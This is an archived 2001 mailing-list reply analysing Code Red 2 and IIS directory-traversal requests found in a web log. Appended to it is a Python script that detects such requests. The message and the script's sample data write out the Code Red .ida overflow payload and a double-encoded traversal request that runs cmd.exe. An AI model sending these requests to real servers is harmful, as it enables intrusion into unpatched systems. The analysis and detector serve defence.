[ale] Code Red 2

Dan Mount danmail at bubber.com
Tue Aug 7 17:59:33 EDT 2001


I know that you are probably not running IIS, but here are the
descriptions....

> Here is what I think is an attempt by the second variant of the code
> red......
> 
> Am I right?
> 
> 24.41.74.126 - - [06/Aug/2001:13:34:22 -0400] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ping+-n+1+-l+128+-w+1+24.41.74.126 HTTP/1.0" 404 314 "-" "-"

This is a different attack, trying to exploit an IIS server that allows
relative paths. If you look at the request as it would be typed at the
command prompt, it would look like: 

"c:\inetpub\scripts\..\..\winnt\system32\cmd.exe ping -n 1 -l 128
24.41.73.126"

This would only work if the IIS server allowed relative paths and the
actual web root lived on "c:".

> 209.186.150.139 - - [06/Aug/2001:13:42:00 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 285 "-" "-"
> 20

This is an attack against Index Server. Very simply, the Microsoft-
supplied default.ida file (or one that works the same way) must live in
the web root to allow Code Red to work... This file is included in the
default web set up with IIS. Using the default web, or settings on most
OSs, is not a very good idea. It'd be similar to installing Red Hat on a
machine and then hooking it up to the Internet without any hardening. I
think we all know that's a bad idea, and so is using the default web with
IIS. Leaving your web content on the same partition as the OS-critical
files is a bad idea as well. 

Not using IIS's default web and moving the web content to a
different partition will keep you clean of these two particular
things... Just like everything else, there's more to it than that to be
safe, though...

Just my .02

DM
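The two requests quoted above are easy to pick out of an Apache-style access log once the path is decoded the way IIS decoded it. The script below is an added example, not part of the original message or of any IIS tooling: it parses constructed combined-format log lines (the two probes above, rebuilt on one line each with the full 224-X filler of the Code Red request, plus a benign request), percent-decodes the path twice so that `%255c` becomes `%5c` and then a backslash, and tags a line when the decoded path traverses to cmd.exe or when a `.ida`/`.idq` request carries the long filler followed by `%uXXXX` sequences. The log format, tag names and thresholds are this example's own choices.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines in Apache combined format, modelled on the two
# requests quoted in the message above plus one benign request. The default.ida
# probe is rebuilt with the 224-X filler the real Code Red request carried.
CODE_RED_PAYLOAD = (
    'X' * 224
    + '%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801'
    + '%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a'
)
SAMPLE_LOG = '\n'.join([
    '24.41.74.126 - - [06/Aug/2001:13:34:22 -0400] "GET /scripts/..%255c..%255cwinnt/'
    'system32/cmd.exe?/c+ping+-n+1+-l+128+-w+1+24.41.74.126 HTTP/1.0" 404 314 "-" "-"',
    '209.186.150.139 - - [06/Aug/2001:13:42:00 -0400] "GET /default.ida?'
    + CODE_RED_PAYLOAD + ' HTTP/1.0" 404 285 "-" "-"',
    '10.0.0.5 - - [06/Aug/2001:13:50:11 -0400] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"',
])

# Apache combined log: client, identd, user, [timestamp], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A '..' path component, after backslashes have been normalised to slashes.
TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')
# Code Red filler (X's for the second variant, N's for the first) followed by
# the %uXXXX-encoded shellcode. Threshold is an assumption of this example.
CODE_RED_QUERY_RE = re.compile(r'^[XN]{200,}.*%u[0-9a-fA-F]{4}')


def decode_path(raw, rounds):
    """Percent-decode `rounds` times and normalise backslashes to slashes.
    One round turns %255c into %5c; a second round turns that into '\\'."""
    s = raw
    for _ in range(rounds):
        s = unquote(s)
    return s.replace('\\', '/')


def classify_target(target):
    """Return tags describing why a request target looks like an IIS probe."""
    path, _, query = target.partition('?')
    tags = []
    once = decode_path(path, 1)
    twice = decode_path(path, 2)
    if TRAVERSAL_RE.search(twice) and 'cmd.exe' in twice.lower():
        tags.append('traversal-to-cmd.exe')
        # Traversal that only shows up after the second decode is the
        # %255c (double-encoded) form rather than a plain ../ request.
        if not TRAVERSAL_RE.search(once):
            tags.append('double-encoded')
    if path.lower().endswith(('.ida', '.idq')) and CODE_RED_QUERY_RE.search(query):
        tags.append('code-red-ida-overflow')
    return tags


def scan(log_text):
    """Parse each log line and return the suspicious ones with their tags."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_target(m.group('target'))
        if tags:
            hits.append({'ip': m.group('ip'), 'status': int(m.group('status')),
                         'target': m.group('target'), 'tags': tags})
    return hits


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit['ip'], hit['status'], hit['tags'])
```

The status code is kept in each hit because it is the part of the line that tells you whether the probe got anywhere: both quoted requests returned 404, so neither the scripts directory nor the .ida handler answered. Two caveats: `unquote` does not turn the overlong UTF-8 form (`%c0%af`) of the older Unicode traversal into a slash, so that variant needs its own decoding step, and a 200 on a `.ida` request would need checking on the host itself, since the overflow can succeed even when the log looks quiet afterwards.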